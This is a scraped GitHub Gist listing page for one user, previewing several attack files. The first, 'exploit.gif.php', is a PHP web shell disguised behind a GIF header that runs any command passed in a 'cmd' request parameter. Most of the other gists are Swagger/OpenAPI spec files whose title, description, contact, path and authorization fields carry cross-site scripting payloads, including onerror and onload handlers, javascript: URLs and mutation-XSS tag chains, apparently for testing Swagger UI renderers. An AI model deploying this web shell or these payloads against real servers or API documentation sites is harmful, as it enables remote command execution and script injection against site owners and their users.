Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
haidv35
/ exploit.gif.php
Last active
June 23, 2022 06:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |
haidv35
/ test6.json
Last active
June 12, 2022 11:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "<svg/onload="alert(1)"//@x" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=ale |
haidv35
/ gist:6dc4b2efcea35ea5e35c5ce1ab23b02c
Last active
June 9, 2022 15:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
haidv35
/ gist:38548e1cff191a72c89f9978fe75bb1f
Last active
June 9, 2022 15:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>"><svg onload=alert(1)> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
haidv35
/ test5.json
Created
May 31, 2022 08:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea></textarea><img src='#' onerror='alert(window.origin)'>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openapi: "3.0.0" | |
| info: | |
| title: Agora Swagger XSS | |
| description: | |
| <h4>xss</h4> | |
| xss<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>"> |
haidv35
/ test3.json
Last active
May 26, 2022 08:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: '2' | |
| title: Example yaml.spec | |
| description: aaaaaaa</p> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
haidv35
/ test2.json
Last active
May 17, 2022 11:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "version": "1.3.13", | |
| "title": "<script>alert(1)</script>" | |
| }, | |
| "basePath": "/api/1", | |
| "schemes": [ | |
| "http", | |
| "https" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |